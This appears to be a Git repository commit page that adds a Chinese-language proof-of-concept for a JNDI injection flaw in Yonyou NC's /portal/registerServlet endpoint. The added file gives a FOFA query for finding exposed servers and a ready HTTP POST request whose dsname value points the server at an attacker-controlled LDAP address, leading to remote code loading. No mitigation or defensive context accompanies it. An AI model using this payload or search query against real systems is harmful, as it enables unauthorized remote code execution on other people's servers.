crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 18:54:50 +08:00
Code Issues Packages Projects Releases Wiki Activity

Create 用友NC系统registerServlet接口存在JNDI注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-05-13 19:04:33 +08:00 committed by GitHub
parent 961a70e308
commit 2325890002
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
用友NC系统registerServlet接口存在JNDI注入漏洞.md Normal file
View File

@ -0,0 +1,22 @@
## 用友NC系统registerServlet接口存在JNDI注入漏洞
## fofa
```
body="Client/Uclient/UClient.dmg"
```
## poc
```
POST /portal/registerServlet HTTP/1.1
Host: 192.168.63.129:8088
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
type=1&dsname=ldap://172.17.176.1:8085/blvVEcJU1
```
![image](https://github.com/wy876/POC/assets/139549762/1aac8d1d-b2c5-4f2d-af47-97c363a59274)
![image](https://github.com/wy876/POC/assets/139549762/e7c8e733-01fc-468b-9acc-b4de63428cdc)